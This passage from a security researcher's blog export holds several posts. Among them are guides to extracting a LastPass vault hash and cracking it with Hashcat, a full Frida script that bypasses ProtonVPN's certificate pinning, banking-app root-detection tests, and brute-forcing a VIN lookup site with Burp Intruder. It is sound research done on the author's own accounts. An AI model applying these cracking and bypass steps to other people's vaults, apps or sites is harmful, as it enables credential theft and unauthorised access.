exact same issue. Most are able to register a security device (iPhone) but can\u0026rsquo;t actually use it for log-ins. Others are unable to find the settings.\nThere are other posts just like the above.\nA few slow responses from PayPal moderators suggest the Passkey feature is only being rolled out in the US, however several users from the US are also experiencing the same problems.\nSummary PayPal is probably well aware of this issue but doesn\u0026rsquo;t seem to be taking action on the matter. It\u0026rsquo;s also very confusing for users since PayPal publishes these types of press releases (from March 2023). But after testing it clearly has issues and not just users in the UK but the US too.\nI can confirm that PayPal only support Yubikey type security devices as Passkeys. But if you don\u0026rsquo;t have one then I\u0026rsquo;d just stick to using an authentication app. Maybe this will get sorted in the future, but who knows.\n","permalink":"https://markuta.com/paypal-passkeys/","title":"PayPal and Passkeys issues since launch"},{"categories":null,"contents":"This is a short blog post on how you can get root access on a Android 12 emulated device with Google services, using a tool (script) called rootAVD by newbit1. I also share a few recommendations which are helpful during mobile analysis.\nAndroid Studio For mobile analysis I generally use my Google Pixel 3a device. However, sometimes I will try to avoid it if I can, especially when I\u0026rsquo;m only curious about an app\u0026rsquo;s network traffic or API endpoints. I will use the Android Studio device emulator instead.\nAndroid Studio supports three types of system images:\nGoogle Services and PlayStore Google Services Open source project (without Google API or PlayStore) The following screenshot shows an example of different system images available under the device creation configuration pane. You can see there are a various targets, architectures and API versions options:\nI opt to go for the Android 12 with arm64-v8a image with Google Services PlayStore. This configuration was chosen because I\u0026rsquo;m running on the Apple M1 chip, and I also want to be able to download apps from the PlayStore.\nNote: Not all apps are available from the Play Store on an emulated device.\nrootAVD rootAVD is available on GitHub https://github.com/newbit1/rootAVD. It is a collection of scripts that automatically modify Android Studio Virtual Device system files, in order to gain root using Magisk.\nThere\u0026rsquo;s really only three steps:\nCreate a AVD on Android Studio Show a list of available AVDs and paths: ./rootAVD.sh ListAllAVDs Select a AVD to be rooted: ./rootAVD.sh ~/Library/Android/sdk/system-images/android-31/google_apis_playstore/arm64-v8a/ramdisk.img Extras After successfully rooting a device, I highly recommend doing the following.\nInstall Magisk Modules These are some of the modules I use to extend the features of Magisk.\nAlwaysTrustUserCertificates by Jeroen Beckers - move user certs into system store. MagiskFrida by ViRb3 - start a Frida server during device boot. Universal SafetyNet Fix by kdrag0n - attempt to bypass Google\u0026rsquo;s SafetyNet features. Create a Snapshot When your virtual device has been configured. I suggest creating a snapshot. This is especially helpful when you\u0026rsquo;re analysing malicious apps, or when you\u0026rsquo;re doing something dangerous which might corrupt the system.\n","permalink":"https://markuta.com/rooted-android-12-emulator/","title":"Getting root on an Android 12 emulated device with Google Services"},{"categories":null,"contents":"In this post I will go into technical details on what attackers could do with the stolen encrypted vaults, specifically how they could use tools like Hashcat to crack vault passwords and get access to sensitive log-in credentials.\nTo simulate the stolen data, I will use my test Lastpass account to extract an encrypted vault from the Chrome Browser extension on macOS. Following this, I will use a wordlist attack to bruteforce the vault which has a weak and guessiable password.\nUpdate: Fixed a few mistakes and added more clarification.\nUpdate 2: More clarification on cracking section, added unencrypted URLs to the what was stolen section, and added a link to a Hashcat benchmark for Lastpass from 2013.\nWhat happened? The Verge published an article which includes a great summary of the breach. There is also a blog post by Lastpass themselves. To summarise, in August 2022 Lastpass suffered a data breach where customer data and source code was stolen. Lastpass didn\u0026rsquo;t do a good job at letting the public (and customers) know of how bad the breach actually was.\nWhat was stolen?\na backup of customer vault data unencrypted website URLs company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses source-code and other intellectual property What can attackers do with the stolen vaults? It really depends, there are a lot of things to consider. A few things that spring to mind are:\nHow are the encrypted vaults stored in the cloud? Did a customer set a weak and easily guessed vault password? What is the key iteration (default or custom)? Other factors not covered? And since I don\u0026rsquo;t know what the stolen data looks like, or how it may be encrypted, this blog post is only a theory and estimation based on data I have access to. This includes the SQLite database used by the Browser extension and data within it.\nIn the next sections I will demostrate how to extract the encrypted vault database from the Chrome extension and pull out specific information to start cracking with Hashcat.\nLastpass Browser extension On Chrome Browsers each extension has a unique ID. The Lastpass extension uses hdokiejnpimakedhajhdlcegeplioahd as the ID. You can confirm this by visiting the URL chrome-extension://hdokiejnpimakedhajhdlcegeplioahd/vault.html in your address bar. You will be presented with the vault log-in page.\nYou can think of it as a local site that uses HTML and JavaScript within your Browser.\nExtracting encrypted vault All extensions have their own folders which are stored locally on the system in various locations depending on OS.\nAs per online documentation the Lastpass support page states devices using Chrome Browsers on Windows systems store the vault data in the following PATH:\n%LocalAppData%\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0 On macOS systems the location is slightly different:\nNote: I use two Profiles on Chrome, hence why you see Profile 1 instead of Default.\nLastpass SQLite database In this folder a SQLite file named 1 with the version: SQLite version 3039004 should be present. This is where encrypted vault data is stored and used by the extension.\n➜ file 1 1: SQLite 3.x database, last written using SQLite version 3039004, file counter 21, database pages 22, cookie 0x5, schema 4, largest root page 11, UTF-8, vacuum mode 1, version-valid-for 21 You can then use a tool like DB Browser for SQLite to view the database contents. I also copied it to Desktop and renamed the file to lastpass-vault-macos-chrome.sqlite so it\u0026rsquo;s easier to remember.\nAll the interesting data is stored in a table called LastPassData. To start cracking Lastpass vault passwords using Hashcat you need three things:\nKey value Iteration count Account email address (hashed in database) These need be formatted like so: KEY:ITERATION:EMAIL\nKey value To retrieve the key value, search column type where value key, and then in the data column select the second row e.g. T4vInfZ+6MGDeEendq4gvA== as shown below:\nYou can also execute the following SQL query:\nSELECT substr(data, -24) FROM LastPassData WHERE type = \u0026#39;key\u0026#39;; It is base64 encoded, which you can decode and get the hex value by:\necho \u0026#34;T4vInfZ+6MGDeEendq4gvA==\u0026#34; | base64 -d | xxd -p We now have the first requirement: 4f8bc89df67ee8c1837847a776ae20bc\nIteration count To retireve the Iteration count, search column type where value accts, and then in the data column the first few charaters before the ;. Lastpass changed the default iteration in 2018 from 5000 to 100100.\nYou can also execute the following SQL query:\nSELECT SUBSTR(data,0,INSTR(data,\u0026#39;;\u0026#39;)) FROM LastPassData WHERE type = \u0026#39;accts\u0026#39;; We also now have the second requirement: 100100\nEmail The database contains a hashed email address value. But we do know that attackers already have this info since the recent Lastpass compromise included email addresses. For the purposes of this blog, I am not going to share the email address which I used.\nFormatted hash With all the requirements the hash should look like this:\n4f8bc89df67ee8c1837847a776ae20bc:100100:test@example.com Cracking Lastpass vaults with Hashcat As a proof of concept I used my MacBook Air with the M1 chip to crack passwords. The speed was absolutely horrible 1110 H/s (hashes per second), but it did work. Attackers on the other hand can leverage multi-GPU device setups with optimised drivers that could easily reach speeds of 2,000,000+ H/s e.g. a benchmark from 2013.\nAs an example of bruteforcing vaults with weak passwords, I downloaded the popular rockyou.txt wordlist and put my actual vault master plaintext password inside (I was lazy and didn\u0026rsquo;t want to reset my password to a weak one), obiviously attackers can\u0026rsquo;t do this.\nI then set the following Hashcat options:\nhashcat -a 0 -m 6800 lastpass-hash.txt ~/Downloads/rockyou.txt -a 0 attack mode Wordlist -m 6800 Lastpass hash algorithm lastpass-hash.txt hash formatted (KEY:ITERATION:EMAIL) rockyou.txt wordlist of plaintext passwords + my password Note: This is only to demonstrate that the extracted values from above section do in fact correspond to the master vault password, you should ignore the time shown as it will take much longer than 29 seconds.\nAnd there we have it, the master vault plaintext password successfully recovered.\nUseful Links and References Lastpass Data Breach covered by The Verge (2022) Lastpass new App hash extraction on Hashcat Forums (2020) Lastpass hashes on Hashcat Forums (2013) Hashcat lastpass benchmark (2013) Breaking Lastpass by Elcomsoft (2020) ","permalink":"https://markuta.com/cracking-lastpass-vaults/","title":"Cracking encrypted Lastpass vaults"},{"categories":null,"contents":"A short blog on how to bypass certificate pinning on the ProtonVPN macOS app using Proxyman and Frida. ProtonVPN is a VPN service operated by the Swiss company Proton AG. The service features a cilent application that users can install on various platforms, such as Android TV and Chromebook.\nI\u0026rsquo;ve personally had a proton email account for a quite a while now, but never really looked into the VPN service. I was mainly curious at how the macOS app communicates with the backend, and what API end-points it talks to.\nFirst Attempt At first I tried to use the HTTP_PROXY environment variable within a Bash shell which was set to my local Burp Proxy listener 127.0.0.1:8080 and then starting the ProtonVPN binary manually, located at /Applications/ProtonVPN.app/Contents/MacOS/ProtonVPN.\nOutput produced when running the binary manually:\n➜ ~ /Applications/ProtonVPN.app/Contents/MacOS/ProtonVPN objc[67247]: Class _TtC5Timer26TimerFactoryImplementation is implemented in both /Applications/ProtonVPN.app/Contents/Frameworks/Timer_DA7C99285C6_PackageProduct.framework/Versions/A/Timer_DA7C99285C6_PackageProduct (0x103194860) and /Applications/ProtonVPN.app/Contents/Frameworks/vpncore.framework/Versions/A/vpncore (0x105acd890). One of the two will be used. Which one is undefined. objc[67247]: Class _TtC5Timer29BackgroundTimerImplementation is implemented in both /Applications/ProtonVPN.app/Contents/Frameworks/Timer_DA7C99285C6_PackageProduct.framework/Versions/A/Timer_DA7C99285C6_PackageProduct (0x1031948f0) and /Applications/ProtonVPN.app/Contents/Frameworks/vpncore.framework/Versions/A/vpncore (0x105acd920). One of the two will be used. Which one is undefined. objc[67247]: Class _TtC14KeychainAccess8Keychain is implemented in both /Applications/ProtonVPN.app/Contents/Frameworks/vpncore.framework/Versions/A/vpncore (0x105acc7d0) and /Applications/ProtonVPN.app/Contents/Frameworks/KeychainAccess.framework/Versions/A/KeychainAccess (0x102a105b8). One of the two will be used. Which one is undefined. 2022-12-21 10:44:03.080 ProtonVPN[67247:1556413] Could not find image named \u0026#39;VPNWordmarkNoBackground\u0026#39;. 2022-12-21 10:44:03.096 ProtonVPN[67247:1556413] Could not find image named \u0026#39;ic-exclamation-circle-filled\u0026#39;. However, this was unsuccessful as the app just ignored the proxy settings.\nSecond Attempt My next attempt was to use a tool called Proxyman. Proxyman is able to proxy network traffic from applications to its own proxy listener. Just like with Burp Suite, it too requires a custom Certificate Authority (CA) installed on the system to analyse encrypted HTTPS traffic.\nLaunching ProtonVPN while Proxyman is running, the app still showed an error while trying to connect and log-in. A standard general error message \u0026ldquo;Proton servers are unreachable\u0026hellip;\u0026rdquo; wasn\u0026rsquo;t very helpful:\nBut when looking at the Proxyman error messages it was immediately clear that certificate pinning was in place. These error messages were extremely helpful in getting around the protections. I got Internal Error responses for all the HTTPS requests. The error message:\nSSL Handshake Failed handshakeFailed(NIOSSL.BoringSSLError.sslError([Error: EOF during handshake])) This was a key piece of information that would lead me to discover the implementation of TLS within ProtonVPN which was called BoringSSL or SwiftNIO SSL library. From there I started to look for how this could be bypassed.\nBoringSSL/SwiftNIO SSL SwiftNIO SSL is a Swift package that contains an implementation of TLS based on BoringSSL. From the error message above it appears ProtonVPN makes use of it.\nVerifying the use of BoringSSL NOTE: On macOS systems you need to Disable SIP to attach to other processes with Frida. You can do this by holding the power button until you reach the recovery utility, and then get to the terminal and type: csrutil disable and reboot.\nTo confirm the ProtonVPN app actually uses the library, I used a Frida script (just the JavaScript part) to enumerate modules which are loaded into memory when the app is executed. The script simply prints to standard output, which I also save to a text file.\nGet ProtonVPN app process PID with frida-ps and grep.\nAnd then run frida -p 6074 -l enum-modules.js -o protonvpn-modules.txt\n➜ frida -p 6074 -l enum-modules.js -o protonvpn-modules.txt ... Module name: libCGInterfaces.dylib - Base Address: 0x1a9330000 Module name: RawCamera - Base Address: 0x1abb52000 Module name: AppSSOCore - Base Address: 0x18ffc2000 Module name: libboringssl.dylib - Base Address: 0x188ae4000 Module name: libusrtcp.dylib - Base Address: 0x191afa000 Module name: libquic.dylib - Base Address: 0x1a423e000 Module name: liblog_network.dylib - Base Address: 0x1a4e15000 ... As seen above the libboringssl.dylib module is loaded at the address 0x188ae4000.\nYou can also use frida-trace to trace function calls targeting the libboringssl.dylib module. For example: frida-trace -p 67505 -i 'libboringssl.dylib!*psk*' which outputs:\nInstrumenting... SSL_CTX_set_psk_server_callback: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_CTX_set_psk_server_callback.js\u0026#34; SSL_CTX_use_psk_identity_hint: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_CTX_use_psk_identity_hint.js\u0026#34; SSL_set_psk_server_callback: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_set_psk_server_callback.js\u0026#34; SSL_CTX_set_psk_client_callback: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_CTX_set_psk_client_callback.js\u0026#34; SSL_set_psk_client_callback: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_set_psk_client_callback.js\u0026#34; boringssl_context_set_psk_identity_hint: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/boringssl_context_set_psk_identity_hint.js\u0026#34; SSL_get_psk_identity_hint: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_get_psk_identity_hint.js\u0026#34; SSL_get_psk_identity: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_get_psk_identity.js\u0026#34; SSL_use_psk_identity_hint: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_use_psk_identity_hint.js\u0026#34; Started tracing 9 functions. Press Ctrl+C to stop. To trace all the functions in a module: frida-trace 67505 -I 'libboringssl.dylib'\nThird Attempt (bypass with Frida) A quick Google search on how to bypass BoringSSL reveals this handy little Frida script by @apps3c. Although it says it\u0026rsquo;s made for iOS platforms, the code can also be used on macOS applications without any extra modifications.\nThis is because the libboringssl.dylib module is the almost (if not) identical to the macOS implementation which uses the same underlying function names that we are trying to hook.\nAt a high level the Frida script works like this:\nCheck libboringssl.dylib module is loaded (otherwise, load it manually). Initialise and set a few custom variables. Create a new implementation of specific SSL functions. Wait and hook these functions and replace the return value. Running Save the Frida script to e.g. BoringSSL-bypass.js and run ProtonVPN using Frida:\nfrida /Applications/ProtonVPN.app/Contents/MacOS/ProtonVPN -l BoringSSL-bypass.js Result And the result is we can now view encrypted HTTPS traffic with the Proxyman app!\nA few API end-points and URLs observed:\nhttps://api.protonvpn.ch/vpn/countries/count https://api.protonvpn.ch/vpn/featureconfig/dynamic-bug-reports https://api.protonvpn.ch/domains/available?Type=login https://protonvpn.com/download/macos-update3.xml https://api.protonvpn.ch/auth/info https://api.protonvpn.ch/auth https://api.protonvpn.ch/auth/2fa https://api.protonvpn.ch/vpn/location https://api.protonvpn.ch/vpn/streamingservices https://api.protonvpn.ch/vpn https://api.protonvpn.ch/vpn/loads https://api.protonvpn.ch/vpn/sessioncount https://api.protonvpn.ch/auth/v4/sessions/forks https://api.protonvpn.ch/vpn/v1/partners?WithImageScale=2 https://api.protonvpn.ch/vpn/v2/clientconfig https://api.protonvpn.ch/vpn/logicals?WithTranslations=true\u0026amp;WithPartnerLogicals=1 https://api.protonvpn.ch/core/v4/notifications?FullScreenImageSupport=PNG\u0026amp;FullScreenImageWidth=2880.0\u0026amp;FullScreenImageHeight=1750.0 https://api.protonvpn.ch/vpn/v1/certificate References and Links Flutter based macOS thick client ssl pinning bypass Malware analysis with dynamic binary instrumentation frameworks Appendix Enumerate modules script // Source: https://github.com/poxyran/misc/blob/master/frida-enumerate-modules.py Process.enumerateModules({ onMatch: function(module){ console.log(\u0026#39;Module name: \u0026#39; + module.name + \u0026#34; - \u0026#34; + \u0026#34;Base Address: \u0026#34; + module.base.toString()); }, onComplete: function(){} }); iOS 13 pinning bypass script /* Description: iOS 13 SSL Bypass based on https://codeshare.frida.re/@machoreverser/ios12-ssl-bypass/ and https://github.com/nabla-c0d3/ssl-kill-switch2 Source: https://codeshare.frida.re/@federicodotta/ios13-pinning-bypass/ * Author: @apps3c */ try { Module.ensureInitialized(\u0026#34;libboringssl.dylib\u0026#34;); } catch(err) { console.log(\u0026#34;libboringssl.dylib module not loaded. Trying to manually load it.\u0026#34;) Module.load(\u0026#34;libboringssl.dylib\u0026#34;);\t} var SSL_VERIFY_NONE = 0; var ssl_set_custom_verify; var ssl_get_psk_identity;\tssl_set_custom_verify = new NativeFunction( Module.findExportByName(\u0026#34;libboringssl.dylib\u0026#34;, \u0026#34;SSL_set_custom_verify\u0026#34;), \u0026#39;void\u0026#39;, [\u0026#39;pointer\u0026#39;, \u0026#39;int\u0026#39;, \u0026#39;pointer\u0026#39;] ); /* Create SSL_get_psk_identity NativeFunction * Function signature https://commondatastorage.googleapis.com/chromium-boringssl-docs/ssl.h.html#SSL_get_psk_identity */ ssl_get_psk_identity = new NativeFunction( Module.findExportByName(\u0026#34;libboringssl.dylib\u0026#34;, \u0026#34;SSL_get_psk_identity\u0026#34;), \u0026#39;pointer\u0026#39;, [\u0026#39;pointer\u0026#39;] ); /** Custom callback passed to SSL_CTX_set_custom_verify */ function custom_verify_callback_that_does_not_validate(ssl, out_alert){ return SSL_VERIFY_NONE; } /** Wrap callback in NativeCallback for frida */ var ssl_verify_result_t = new NativeCallback(function (ssl, out_alert){ custom_verify_callback_that_does_not_validate(ssl, out_alert); },\u0026#39;int\u0026#39;,[\u0026#39;pointer\u0026#39;,\u0026#39;pointer\u0026#39;]); Interceptor.replace(ssl_set_custom_verify, new NativeCallback(function(ssl, mode, callback) { // |callback| performs the certificate verification. Replace this with our custom callback ssl_set_custom_verify(ssl, mode, ssl_verify_result_t); }, \u0026#39;void\u0026#39;, [\u0026#39;pointer\u0026#39;, \u0026#39;int\u0026#39;, \u0026#39;pointer\u0026#39;])); Interceptor.replace(ssl_get_psk_identity, new NativeCallback(function(ssl) { return \u0026#34;notarealPSKidentity\u0026#34;; }, \u0026#39;pointer\u0026#39;, [\u0026#39;pointer\u0026#39;])); console.log(\u0026#34;[+] Bypass successfully loaded \u0026#34;); ","permalink":"https://markuta.com/protonvpn-macos-certificate-pinning-bypass/","title":"Bypass ProtonVPN macOS Certificate Pinning with Proxyman and Frida"},{"categories":null,"contents":"In this post I will be comparing root detection features on 24 UK mobile banking apps using the latest version of Magisk (v24.3) on a Google Pixel 3a. You can head straight to the comparisons table if you want to see the results.\nTest Device The device used was a Google Pixel 3a running Android 10. It had been rooted using the latest version of Magisk which was v24.3 (at the time of writing). I had also installed three Magisk modules the latest versions of: MagiskFrida, Move Certificates, and Universal SafetyNet fix. All of which were enabled during testing.\nMethodology The test itself is fairly basic. Every app was downloaded directly from the Google PlayStore and not from a third-party or mirroring site. The app versions were the latest available as of 15th March 2022. I ran each app in three different Magisk configurations:\nDefault Magisk config Attempt hiding Magisk by renaming the app Renaming the app and also enable Zygisk with enfored denylist I also made sure to clear each app\u0026rsquo;s cached files and storage before running them under a different configuration.\nConfiguration Go to Settings and scroll down: rename Magisk, enable Zygisk, and select denylists: Frida I also included a check on whether an instance of Frida is detected. Frida is a dynamic instrumentation toolkit used for reverse engineering software and bypassing certain security restrictions.\nfrida -U -l hook.js -f com.bank.name --no-pause I used the above command to spawn each app while supplying a hook.js script, to try bypass certificate pinning. If the app crashes or stops responding I assumed Frida\u0026rsquo;s process injection is being detected.\nBank comparisions All testing was conducted on 15th March 2022 with the latest available app versions.\nTop UK Banks A no means root or Frida (is not) detected. No visual indications like warnings or app crashes. The app runs as normal and I can get to the log-in menu without issues. Note: It\u0026rsquo;s possibile that passive detections features do exist but doesn\u0026rsquo;t limit usability.\nA yes means root or Frida (is) detected. A warning message may be display and/or the app stops working entirely, and fails to launch properly.\n# Bank Version Magisk (default) Magisk (rename) Magisk (denylist) Frida (inject) 1 Barclays 2.55.0 yes yes no yes 2 HSBC 3.17.1 yes* yes* yes* yes 3 NatWest 07.15.0001.36.0 no no no no 4 RBS 07.15.0001.36.0 no no no no 5 Lloyds 85.01 no no no yes 6 Santander 4.19.1 (12) yes yes yes yes 7 Nationwide 21.0.1 no no no no 8 TSB 6.2.3 yes yes no no 9 Halifax 85.01 no no no yes notes:\nBarlcays gives a warning message and exits. Injecting with Frida crashes the app. HSBC gives a warning but doesn\u0026rsquo;t exit. Injecting into with Frida crashes the app. Lloyds hangs when injecting with Frida and does not open the app. Santander gives a warning and exits. Injecting with Frida hangs the app. Halifax crashes the app when injecting with Frida. Other Banks # Bank Version Magisk (default) Magisk (rename) Magisk (denylist) Frida (inject) 1 Amex 6.51.0 no no no no 2 Capital One 8.56.8149 no no no no 3 Chase 1.9.0 no no no yes 4 Clydesdale 22.2.181 no no no no 5 Co-op 20211001 yes yes no no 6 First Direct 4.13.0 yes* yes* yes* no 7 M\u0026amp;S 4.18.0 yes yes yes yes 8 Tesco 4.12.0 no no no yes 9 Triodos 3.30.0 no no no no 10 Monzo 4.22.1 no no no no 11 Virgin Money 22.2.181 no no no no 12 Starling 2.40.0.62912 yes yes no no 13 Sainsbury\u0026rsquo;s 2.8.0 yes yes yes no 14 Metro 9.10.1 yes yes no no 15 MBNA 85.01 no no no yes notes:\nChase hangs when injecting with Frida. TSB exits without a warning. M\u0026amp;S bank crashes everytime, even when injecting with Frida. First direct gives a warning but allows you to use the app. Starling gives a warning and exits. Metro gives a warning and exits. Sainsburys gives a warning but allows you to use the app. Tesco bank crashes when injecting with Frida. Co-op gives a warning then exits. Resources Magisk Github Magisk Issues MagiskFrida module by ViRb3 SafetyNet-fix module by kdrag0n Move Certificates by yochananmarqos ","permalink":"https://markuta.com/magisk-root-detection-banking-apps/","title":"Comparing root detection on banking apps with latest version of Magisk"},{"categories":null,"contents":"Back story As part of an out-of-country car repair, my partner\u0026rsquo;s dad suspected that his transmission had been switched out for a faulty one without his permission. He noticed that after a second trip to a different mechanic, the car was not performing as expected so he asked me to help find out when his part was changed.\nThe vehicle was a Hyundai Santa Fe 2008 bought in Bulgaria. It had a VIN of KMHSH81WP8U272568, with a transmission number of U7LFP467454. The new replaced transmission part had a number U8LFG677211. I needed to find the corresponding VIN.\nNote: the original VIN and transmission number above are not his actual vehicle information, but are really close. The new tranmission number is the real one.\nProblem The problem is that only the transmission number is known, there weren\u0026rsquo;t any free or paid (I may be wrong) which offered reverse VIN lookups from car parts. With the VIN, I can find out what country the car was manufactured for, but not with tranmission number unless you do what I did.\nWhat is a VIN? The Vehicle Identification Number is a fingerprint of an automobile. It includes information about a vehicle such as; country of origin, build date, build factory, name/model, model date, engine type, serial number and more.\nA VIN is 17-characters long which can be further split into three parts: World Manufacturer Identifier (WMI) – large list on available Wiki, Vehicle Description Section (VDS) and Vehicle Identification Section (VIS).\nVIN example Here is an example of a 2020 Lamborghini Huracan VIN ZHW UT4ZF8 LLA13213. You can also use the Lamborghini VIN format available on Wikibooks. Below shows how it can be decoded:\nWorld Manufacturer Identifier ZHW 1st Z the manufacturer region (Italy). 2nd and 3rd HW the manufacturer (Lamborghini). Vehicle Description Section UT4ZF8 4th U the model type which is Huracan. 5th T the market which is US. 6th 4 the body type which is Convertible. 7th Z the engine type which is 470 kw/hp. 8th F features which are Passive Seatbelts, Driver \u0026amp; Passenger Airbags. 9th 8 the VIN check/security code. Vehicle Identification Section LLA13213 10th L the model year which is 2020. 11th L the manufacturer plant which is in Italy. 12th, 13th and 14th A13 the Manufacting Code. 15th, 16th and 17th 213 the Serial Number. VIN lookup sites There are plenty of VIN lookup sites, some also are able to check whether the vehicle has been stolen, a UK based site called isitnicked.com. Or USA based site called www.nicb.org.\nMany sites do not provide the same level of information. For example the site en.vindecoder.pl doesn\u0026rsquo;t show any assoicated parts like engine numbers or tranmission numbers, whilst others such as www.vindecoderz.com do.\nYou can see the tranmission number U7LFP467454 is shown, as well as the engine number, and much more. It also shows the Country [C17] Spain of where the vehicle was manufactured for, this was quite important in my case.\nAnalysis To help with this project I used a software that has a large collection of VINs. It does require a paid license but you can still extract VIN numbers and other useful information.\nMicrocat software Microcat is a software product by Infomedia Ltd that enables professionals such as car dealerships, mechanics or diagnostic engineers to perform searches and identify vehicles as well as their associated parts.\nThis product offers a selection of manufacturer databases, each with specific year range. In this post I will be using the Microcat Hyundai 2008-2018 version which is over 21GB. Note: this is a paid product, however, you can still find some downloads online by searching HYUNDAI 08-2018 Setup.\nInstallation The installation includes three discs or ISOs, each taking about 7GB. The size of the database is down to the vast amount of information that is included for each model Hyundai between 2008-2018, covering all models and assoicated parts.\nNow since I know the vehicle model and year range, I deselected all the default Hyundai models, and only selected a few. This way I won\u0026rsquo;t have to waste my VM\u0026rsquo;s storage on models that I\u0026rsquo;m not interested in. I only selected the Santa Fe model with the range of 2006-2012.\nInitial assessment I knew part of this project may involve brute-forcing at some point. So I started my intitial analysis by examining the installation folder created by the Microcat software. By default, two folders inside the C:\\ directory are created. One called HYW_Data and the other called MCHYW. The HYW_Data folder takes up most of storage (20GB worth), so I decided to have a closer look.\nA folder called VIN immediately peaked my interest:\nC:\\HYW_Data\\VIN\u0026gt;dir Volume in drive C has no label. Volume Serial Number is 9AAC-43BE Directory of C:\\HYW_Data\\VIN 06/03/2022 17:02 \u0026lt;DIR\u0026gt; . 06/03/2022 17:02 \u0026lt;DIR\u0026gt; .. 04/07/2017 00:26 1,300 ckdcatmap.idx 22/06/2018 22:31 902,074 model.idx 21/02/2022 22:20 \u0026lt;DIR\u0026gt; options 21/02/2022 22:20 \u0026lt;DIR\u0026gt; Rego 22/06/2018 22:31 1,243,335,328 vin.idx 22/06/2018 22:50 725,762,912 vinrev.idx 4 File(s) 1,970,001,614 bytes 4 Dir(s) 9,730,449,408 bytes free Inside this directory a file called vin.idx exists, which is over 1.2GB.\nUsing strings The software is only available on Windows systems, and so I used WSL (Ubuntu) which comes with simple reverse engineering tools like strings, grep, xxd and more by default. I like using strings on files because it\u0026rsquo;s a very simple and a quick way of identifying ASCII characters that may resemble something meaningful.\nThe strings command on the file named vin.idx showed the following:\ntester@DESKTOP-02HBA66:/mnt/c/HYW_Data/VIN$ strings vin.idx ... 200612055NMSG13D27H057982uh 200612055NMSG13D27H058050uh 200612055NMSG13D27H058095uh 200612055NMSG13D27H058100uh 200612075NMSG13D27H058176uh 200612065NMSG13D27H058209uh 200612065NMSG13D27H058226uh 200612065NMSG13D27H058274 ... Each record is on new line which makes it easier to understand. The first 8 digits 20061205 is the date of when the vehicle was made. The next 17-characters 5NMSG13D27H057982 is the actual VIN. And the remaining characters are some sort of data format.\nThere are approxmiately 42,873,633 valid Hyundai VINs in this database.\ntester@DESKTOP-02HBA66:/mnt/c/HYW_Data/VIN$ strings vin.idx | wc -l 42873633 By manually scrolling through the database I was seeing all sorts VINs of Hyundai models, even though I excluded them during installation. I also noticed there were vehicles from 1992 which I thought were not part of the database.\nAnyway, I needed to start searching for only certain types of models and years.\nSearch queries I started off by confirming the VIN KMHSH81WP8U272568 actually exists, which it did.\ntester@DESKTOP-02HBA66:/mnt/c/HYW_Data/VIN$ strings vin.idx | grep \u0026#39;KMHSH81WP8U272568\u0026#39; 20070907KMHSH81WP8U272568^8 Now that the database is confirmed to be legitimate, the next step would be to decrease the database size (1.2GB) by only focusing on Santa Fe models with specific engine types and years.\nI tried recursively searching for the transmission number U7LFP467454 but that didn\u0026rsquo;t get any hits. That would be too easy, right ;)\nLooking for patterns I started to search for only the U7LFP chunk of the tranmission number to see if there were other examples. Many of the results were on b-parts.com, a website which sold replacement parts, and also sometimes included the associated VIN.\nBy comparing VINs, they both seem quite similar. I used www.ilcats.ru to find the full transmission number which was U7LFP361217. The table shows the comparison.\n# VIN Model Type Transmission no. Year 1 KMHSH81WP8U272568 Santa Fe SH81W U7LFP467454 2008 2 KMHSH81WP7U232082 Santa Fe SH81W U7LFP361217 2007 I did the same thing for new transmission number U8LFG677211 (the one that I need to find the VIN for). Again, only searching for just the U8LFG part. A product listing page on ww.zapchast.com.ua was found that included some useful information.\nEven though the description says the model is year 2008, it is actually from 2009 based on the VIN. The table shows the comparison, #1 is the VIN I want to find.\n# VIN Model Type Transmission no. Year 1 ????????????????? Santa Fe SH81W U8LFG677211 2009? 2 KMHSH81WP9U?????? Santa Fe SH81W U8LFG?????? 2009 From all the information I could gather, the first few characters of the VIN KMHSH81WP stayed consistant throughtout three years. And since the transmission number U8LFG?????? was assoicated with a VIN that mostly likely was from the year 2009, I had another search parameter.\nMaking wordlists Based on the two parameters, I created two much smaller files from the massive vin.idx database. This meant that the VINs were much easier to process, and by process I mean to brute-force.\nOne for models with SH81W and year 2008:\nstrings vin.idx | grep -e ^2008 | grep -e SH81W | cut -c 9-25 \u0026gt;\u0026gt; santa_fe_vin_2008.txt And same model but with year 2009:\nstrings vin.idx | grep -e ^2009 | grep -e SH81W | cut -c 9-25 \u0026gt;\u0026gt; santa_fe_vin_2009.txt Going from 1.2GB to:\nsanta_fe_vin_2008.txt is 484KB santa_fe_vin_2009.txt is 112KB You might might of noticed I used cut -c 9-25 to only select the VIN. Below is some example output data:\n... KMHSH81WR9U466119 KMHSH81WR9U466125 KMHSH81WR9U466130 KMHSH81WR9U466134 KMHSH81WR9U466138 KMHSH81WR9U466143 KMHSH81WR9U466148 KMHSH81WR9U466153 ... Bruteforce I know I could\u0026rsquo;ve just used the entire vin.idx database, but I would prefer not to hammer random VIN lookup sites with my requests. It\u0026rsquo;s also likely I\u0026rsquo;d get blocked.\nNow that I have a good dictionary wordlist, I can use any online VIN lookup site which also reveals the transmission number, and then just filter their response. I\u0026rsquo;m very familar with Burpsuite, so I opted to use Intruder to send my HTTP requests. I found www.hyundaiforum.pro – (non-https) to be the most responsive.\nAn example request looks like this:\nGET /view_vin_res.php?lang_code=EN\u0026amp;vin=KMHSH81WP9U440726 HTTP/1.1 Host: www.hyundaiforum.pro [...] Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close Setting the Attack type in Intruder as Sniper and position: And importing a simple list of VINs as the payload: The reason why the request payload count is only 1,819 was because I did some further manual searches and found that P9U440002 - R9U448317 is the \u0026ldquo;goldilocks\u0026rdquo; VIN range I needed to focus on.\nOnce Burpsuite had finished the attack, I quickly applied a filter on the response to only show requests which have the string U8LFG677211 for the transmision number: After applying the filter, only one request matched. Bingo!\nYou can also see in the following screenshot this part was in 